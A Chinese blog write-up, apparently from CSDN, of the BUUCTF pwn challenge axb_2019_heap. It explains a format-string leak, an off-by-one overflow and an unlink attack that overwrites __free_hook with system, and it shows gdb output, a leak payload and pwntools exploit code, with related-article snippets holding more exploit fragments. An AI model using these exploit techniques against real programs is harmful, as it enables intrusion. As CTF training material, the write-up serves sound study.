axb_2019_heap详解

axb_2019_heap漏洞剖析
最新推荐文章于 2024-02-20 00:57:52 发布
原创 最新推荐文章于 2024-02-20 00:57:52 发布 · 775 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#buu #axb_2019_heap

本文深入分析axb_2019_heap程序的格式化字符串漏洞、off-by-one漏洞及unlink漏洞,详述如何利用这些漏洞获取shell权限的过程。

关于axb_2019_heap的详解

参考:buuctf axb_2019_heap

程序流程

  1. banner:存在格式化字符串漏洞,可以泄漏栈上的信息

  2. add:根据idx创建size(大于0x80)大小的内容为content的块

    块指针和块大小存放在一个全局变量note中

  3. delete:释放的很干净,没有uaf

  4. edit:存在off by one

    get_input(*((_QWORD *)&note + 2 * v1), *((_DWORD *)&note + 4 * v1 + 2));

    if ( a2 + 1 <= (unsigned int)v3 )v3是以及输入的长度,a2是给定的长度,存在一个字节的溢出

调试

这个程序没有保留调试信息,不能调试,只能一步步看,,,

GDB调试指南

Reading symbols from axb_2019_heap...(no debugging symbols found)...done.

漏洞利用

  1. 利用格式化字符串泄露栈上信息

    • __libc_start_main+240 => libc基地址

    • (main) ◂— push rbp => 程序基地址

  2. 由于存在全局变量note,故可以利用unlink控制chunk指针

  3. 修改__free_hook为system,get shell

详细过程

1.格式化字符串

计算偏移:直接算或者用工具 => 得到偏移为7

在这里插入图片描述

执行到printf(&format);

 ► 0x555555554b4e <banner+105>    call   printf@plt <printf@plt>
        format: 0x7fffffffde4c ◂— 'aaaaaaaa'
        vararg: 0x7fffffffb7b0 ◂— 'Hello, our name:'

pwndbg> stack 30
00:0000│ rsp    0x7fffffffde40 ◂— 0x0
01:0008│ rdi-4  0x7fffffffde48 ◂— 0x61616161ffffde60
02:0010│        0x7fffffffde50 ◂— 0x550061616161 /* 'aaaa' */	#输入的数据
03:0018│        0x7fffffffde58 ◂— 0xd23db0a55446d00
04:0020│ rbp    0x7fffffffde60 —▸ 0x7fffffffde80 —▸ 0x555555555200 (__libc_csu_init) ◂— push   r15
05:0028│        0x7fffffffde68 —▸ 0x555555555186 (main+28) ◂— mov    eax, 0
06:0030│        0x7fffffffde70 —▸ 0x7fffffffdf60 ◂— 0x1
07:0038│        0x7fffffffde78 ◂— 0x0
08:0040│        0x7fffffffde80 —▸ 0x555555555200 (__libc_csu_init) ◂— push   r15
09:0048│        0x7fffffffde88 —▸ 0x7ffff7a2d840 (__libc_start_main+240) ◂— mov    edi, eax	#可以泄露libc_base
0a:0050│        0x7fffffffde90 ◂— 0x1
0b:0058│        0x7fffffffde98 —▸ 0x7fffffffdf68 —▸ 0x7fffffffe2d3 ◂— '/home/winter/buu/axb_2019_heap'
0c:0060│        0x7fffffffdea0 ◂— 0x1f7ffcca0
0d:0068│        0x7fffffffdea8 —▸ 0x55555555516a (main) ◂— push   rbp	#main起始地址,可以泄露程序基地址

所以__libc_start_main+240的偏移为15,main的偏移为19。

通过计算即可得到libc_base和程序基地址(开启了pie,每次都不一样)

p.recvuntil("Enter your name: ")
payload = "%15$p.%19$p"
p.sendline(payload)
main_240 = int(p.recvuntil(".")[-13:-1],16)
push_rbp = int(p.recvuntil("\n")[-13:],16)
print(hex(main_240))
print(hex(push_rbp))

libc_base = main_240 - libc.sym['__libc_start_main']
最低0.47元/天 解锁文章
buuctf axb_2019_heap
weixin_45677731的博客
09-23 1732
拖进IDA之后,发现输入函数是存在off-by-one漏洞的,可以进行溢出 同时存在全局指针数组,就可以利用这个溢出来构造fake chunk,然后实现unlink 除此之外,这个程序malloc的大小是不能小于0x80的,额。。。其实这个不重要,问题不大,注意下就好了 但是,程序的保护全都开启了 也就是说,程序的地址是随机的,我们并不知道chunk指针的存放地址 如何泄露呢?这时还发现程序开头存在格式化字符串的漏洞 打开调试,输入8个a,在printf(&format)这里停一下,然后看下栈
[BUUCTF]PWN——axb_2019_heap(格式化字符串,off-by-one,unlink)
mcmuyanga的博客
01-26 1003
axb_2019_heap 附件 步骤: 例行检查,64位程序,保护全开 本地试运行一下,看看大概的情况,经典的堆题的菜单 64位ida载入 main() banner()
axb_2019_heap
doudoudedi
02-05 1002
思路 格式化字符串泄露程序基址和libc基址然后unlink一个指针到bss段将free_hook写入system释放即可拿到shell exp: from pwn import * #p=process('./axb_2019_heap') p=remote('node3.buuoj.cn',29873) elf=ELF('./axb_2019_heap') libc=elf.libc #gdb...
[BUUCTF]-PWN:axb_2019_heap解析(格式化字符串漏洞,unlink,off by one)
2301_79326813的博客
02-20 629
查看保护查看ida大致就是alloc创建堆块,free释放堆块,以及fill填充堆块。
Buuctf:【axb_2019_heap】(格式化字符串,of by null,unlink)
weixin_51055545的博客
01-18 1362
Buuctf:【axb_2019_heap】(格式化字符串,of by null,unlink) 例行检查 64位,保护机制全开,IDA中分析 漏洞分析 此处edit()函数中会多写入\x00字节,导致溢出一个\x00字节,存在of by null 漏洞,add()中限制了我们申请堆块的大小,只能申请大于0x80的堆块 利用思路 1.利用格式化字符串漏洞泄露出程序基地址和libc基地址 2.利用unlink,通过unlink修改chunk0的内存地址为free_hook地址,再次edit0号堆块,覆写为s
axb_2019_heap【write up】
m0_73756460的博客
04-08 168
buu刷题 axb_2019_heap【write up】
buuctf hitcon_training,axb_2019_heap,unlink一般利用方法总结
weixin_46521144的博客
07-10 273
两道都是使用了unlink 并且两道题的方法一模一样,和上一篇的ZCTF的一道题也一样 使用unlink的题目一般有这样的特征 指针位置泄露(这三道题全都是在bss上的指针) 存在off-by-one或者off-by-null以及其他溢出修改漏洞 第一条用于控制unlink堆块的检验,第二条用于激活unlink,两者缺一不可。 利用方法: 制造unlink块,修改fd为ptr-0x18,bk为ptr-0x10,构造chunk_head和下一个chunk的prev_size,通过off修改下一个chun
axb-2019-fmt64
Stella_Leo的博客
08-24 840
格式化字符串,讲点不一样的 64位格式化字符串学习 题目来自2019安洵杯。 这个漏洞原理很简单,就是简单的格式化字符串漏洞,泄露和劫持got表。但是64位呢,和32位有一点点不一样的地方,在这里强调和学习记录一下 直接把我坑傻了顺便学习一下libcsearcher的用法 [*] '/home/l/Desktop/AD/axb_2019_fmt64' Arch: amd64-64-little RELRO: Partial RELRO Stack: No cana
【Pwn】2019安洵杯线上赛 Heap
Nothing
12-01 538
一道常规的pwn题,查看程序保护。 保护全开。分析程序发现bannar函数有格式化字符串漏洞,可以用来泄露代码段基址以及Libcdi地址,edit函数有一字节溢出,可以修改next chunk的size,且chunk指针存储在bss段上想到unlink。 from pwn import * io=remote('xx.xx.xx.xx',xxxxx) libc=ELF('./libc-2.23...
AXB
weixin_30580341的博客
01-21 718
大数相乘 sum中,高位在前,所以两个乘数必须先转换一下,即末位在前,依此类推。 View Code 1 #include<stdio.h> 2 #include<string.h> 3 const int maxn = 505; 4 char a[ maxn ],b[ maxn ]; 5 int sum[ maxn*2 ]; 6...
shanghai2019_boringheap
doudoudedi
02-18 415
思路 abs函数(取绝对值)的溢出使得为负数然后改size构造2个指针指向同一chunk完成一次double free为远程ubuntu18即可以直接打free_hook exp: from pwn import * #p=process('./pwn') p=remote('node3.buuoj.cn',26942) elf=ELF('./pwn') libc=elf.libc def ad...
axb_2019_fmt32
、moddemod
07-19 946
exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() proc_name = './axb_2019_fmt32' # p = process(proc_name) p = remote('node3.buuoj.cn', 27478) elf = ELF(proc_name) read_got = elf.got['read'..
BUUCTF axb_2019_fmt32
BengDouLove的博客
04-16 1682
主程序就是这样的,能看到有一个printf的格式化字符串漏洞 sprintf 相当于把参数替换了之后的格式化字符串送入了第一个参数,也就是format 首先,没有后门也没有系统函数,要用格式化字符串泄露出牟哥libc函数,来获得libc基址 然后,仔细算一下 s 和 format 两个参数,都没有溢出,,也没有函数能写进got表,,所以还是再次利用格式化字符串漏洞通过%n来写入数据 先看...
PWN-PRACTICE-BUUCTF-23
P1umH0的博客
09-09 701
PWN-PRACTICE-BUUCTF-23gyctf_2020_some_thing_excetingaxb_2019_heap[极客大挑战 2019]Not Badinndy_echo gyctf_2020_some_thing_exceting 程序读取了flag到bss段上的0x6020A8地址处 存在uaf漏洞,利用fastbins的LIFO原则,create大小合适的chunk并free 再次create,将0x6020A8覆写到之前create并free掉的chunk里,最后show即可打印出
BUUCTF刷题5
m0_51251108的博客
10-30 696
题目:axb_2019_heap:actf_2019_babystack:picoctf_2018_got_shell:[极客大挑战 2019]Not Bad:gyctf_2020_force:picoctf_2018_can_you_gets_me:mrctf2020_easy_equation:wdb_2018_2nd_easyfmt:ciscn_2019_es_1:axb_2019_fmt64: axb_2019_heap: 参考师傅:buuctf axb_2019_heap_R1nd0的博客-CSD
BUUCTF-PWN刷题记录-6
weixin_44145820的博客
04-14 974
目录picoctf_2018_are you rootciscn_2019_final_2 picoctf_2018_are you root 例行安全检查 菜单如下: 我们需要auth_level等于5才能get flag user结构体如下 struct USER{ char *name; long long auth_level; } 漏洞原理分析: 在login中分配了两次内存...
cmcc_simplerop
doudoudedi
02-20 1114
思路 明显rop可以用工具但是需要自己调一下长度emem exp: from pwn import * from struct import pack #io=process('./simplerop') io=remote('node3.buuoj.cn',27913) io.recvuntil(':') # Padding goes here p = 'a'*0x14+p32(1)*3 p +...
{"count": "AXB_MTWM_CALL_FINISH_RECORD_INFO", "query": {"result": "0", "baselineTime": {"$gte": 1740758400000, "$lt": 1740844800000}}}, 变成mongo查询语句
最新发布
03-13
### 将JSON结构转换为MongoDB查询语句 要将给定的JSON结构转换为MongoDB查询语句,可以按照以下方式构建查询: #### 查询语句 假设集合名称为 `AXB_MTWM_CALL_FINISH_RECORD_INFO`,查询条件如下所示: ```javascript { "result": "0", "baselineTime": { "$gte": ISODate("2025-01-28T00:00:00Z"), "$lt": ISODate("2025-01-29T00:00:00Z") } } ``` 完整的MongoDB查询语句可以通过 `db.collection.find()` 方法实现: ```javascript db.AXB_MTWM_CALL_FINISH_RECORD_INFO.find({ "result": "0", "baselineTime": { "$gte": ISODate("2025-01-28T00:00:00Z"), "$lt": ISODate("2025-01-29T00:00:00Z") } }); ``` 此查询表示筛选出集合 `AXB_MTWM_CALL_FINISH_RECORD_INFO` 中满足以下两个条件的文档: 1. 字段 `result` 的值等于 `"0"`[^1]。 2. 字段 `baselineTime` 的值大于或等于 `ISODate("2025-01-28T00:00:00Z")` 并小于 `ISODate("2025-01-29T00:00:00Z")`[^2]。 如果需要进一步优化性能,可以在 `result` 和 `baselineTime` 上创建复合索引来加速查询操作。例如: ```javascript db.AXB_MTWM_CALL_FINISH_RECORD_INFO.createIndex({ result: 1, baselineTime: 1 }); ``` 这一步骤有助于提高查询效率,尤其是在处理大规模数据集时[^3]。 #### Java 实现示例 以下是基于 Java 驱动程序执行上述查询的一个示例代码片段: ```java import com.mongodb.client.MongoClients; import com.mongodb.client.MongoCollection; import com.mongodb.client.MongoDatabase; import org.bson.Document; public class MongoDBQueryExample { public static void main(String[] args) { try (var mongoClient = MongoClients.create("mongodb://localhost:27017")) { var database = mongoClient.getDatabase("your_database_name"); var collection = database.getCollection("AXB_MTWM_CALL_FINISH_RECORD_INFO"); Document query = new Document("result", "0") .append("baselineTime", new Document("$gte", java.time.Instant.parse("2025-01-28T00:00:00Z")) .append("$lt", java.time.Instant.parse("2025-01-29T00:00:00Z"))); collection.find(query).forEach(doc -> System.out.println(doc.toJson())); } } } ``` 这段代码展示了如何通过 Java API 构建并运行指定的查询逻辑[^4]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

书文的学习记录本

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值